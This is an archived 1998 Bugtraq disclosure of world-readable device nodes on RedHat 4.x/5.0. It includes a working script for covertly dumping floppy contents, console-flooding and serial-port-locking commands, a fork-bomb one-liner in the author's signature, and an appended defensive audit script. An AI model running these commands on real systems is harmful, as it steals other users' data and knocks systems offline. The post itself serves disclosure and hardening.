Bugtraq archives for 1st quarter (Jan-Mar) 1998: RedHat 4.x/5.0 /dev permissions

RedHat 4.x/5.0 /dev permissions

Michał Zalewski (lcamtufPOLBOX.COM)
Wed, 4 Feb 1998 09:45:37 +0100

First one
----------

Any user can read data from a floppy (even one that is not mounted) using
"cat /dev/fd0H1440". It isn't dangerous in itself, but... any user
may write a script which periodically checks whether the floppy has
just been unmounted, then dumps its content to a file. Here's a sample
'floppy collector':

-- fdumper --
#!/bin/sh
DUMP_DEV=/dev/fd0H1440   # raw device node, world-readable on the affected systems
MOUNT_DEV=/dev/fd0       # device name as it appears in mount(8) output
LABEL=0
DUMPED=1
while :; do
  sleep 1
  if ! mount | grep -q "^$MOUNT_DEV "; then
    # not mounted: dump once, right after an unmount
    if [ "$DUMPED" = "0" ]; then
      echo "Dumping image #$LABEL..."
      cat "$DUMP_DEV" > ".fdimage$LABEL"
      LABEL=$((LABEL + 1))
      DUMPED=1
    fi
  else
    DUMPED=0             # mounted now; arm the dump for the next unmount
  fi
done
-- eof --

Also, if there's no floppy in the drive, an unprivileged user may flood
the kernel log console (local console by default!!!):

[userhost sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to the console (default klogd behaviour). Also,
every printk(...) (called by the fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.

Second one
-----------
(not tested with rh 5.0)

Ordinary users are allowed to read /dev/ttyS*. The serial port driver
disallows multiple access attempts at the same time, so a user may
permanently lock a chosen port using this command:

[userhost user]$ cat /dev/ttyS0
(Ctrl+Z)
[userhost user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now the serial port is in an unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, e.g. /dev/sequencer,
which are world-readable or even world-writable.

There's NO reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain interesting
data or cause a system failure by reading/writing these devices.

Solution...
------------

ls -l /dev/* | grep "r-- "
chmod ;)

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufboss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
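The author's one-liner (`ls -l /dev/* | grep "r-- "`) only catches nodes that are world-readable and nothing else; it misses `rw-` entries such as the sequencer above. The following audit is an added example, not part of the original post: it reads `ls -l` output for a directory, flags block and character devices whose "other" bits grant read or write, skips a short allowlist of nodes that are meant to be shared (the allowlist and the sample listing are constructed for this example), and prints the `chmod` that would remove world access instead of running it.

```sh
#!/bin/sh
# Audit a /dev listing for world-readable or world-writable device nodes.
# Input is `ls -l` output, so it can also be run over a saved listing.

# Constructed sample listing (not a real system); the sizes of device
# entries are "major, minor" pairs, so the path is taken as the last field.
SAMPLE='brw-rw-r--   1 root     floppy     2,  28 May  5  1998 fd0H1440
brw-rw----   1 root     floppy     2,   0 May  5  1998 fd0
crw-r--r--   1 root     tty        4,  64 May  5  1998 ttyS0
crw-rw-rw-   1 root     root       1,   3 May  5  1998 null
crw-rw-rw-   1 root     sys       14,   1 May  5  1998 sequencer
-rw-r--r--   1 root     root        512 May  5  1998 MAKEDEV.log'

# Reads `ls -l` lines on stdin; prints "<mode> <path>" for every b/c
# device whose world ("other") bits include r or w.
audit_dev_listing() {
  while IFS= read -r line; do
    mode=${line%% *}        # first field: type char + 9 permission bits
    path=${line##* }        # last field: device name
    case "${path##*/}" in
      # assumed allowlist: nodes that must stay world-accessible
      null|zero|full|tty|random|urandom|ptmx) continue ;;
    esac
    case "$mode" in
      # position 8 = other-read, position 9 = other-write (1-based)
      [bc]??????r??*|[bc]???????w?*) printf '%s %s\n' "$mode" "$path" ;;
    esac
  done
}

# Emits one `chmod o-rw` per flagged node for review; nothing is changed.
suggest_fix() {
  audit_dev_listing | while read -r mode path; do
    printf 'chmod o-rw %s\n' "$path"
  done
}

# Stand-alone demo over the constructed sample; on a live system use:
#   ls -l /dev | suggest_fix
printf '%s\n' "$SAMPLE" | suggest_fix
```

Review the suggested commands before applying them; some hardware nodes (sound, for instance) may legitimately need group access, which `o-rw` leaves untouched.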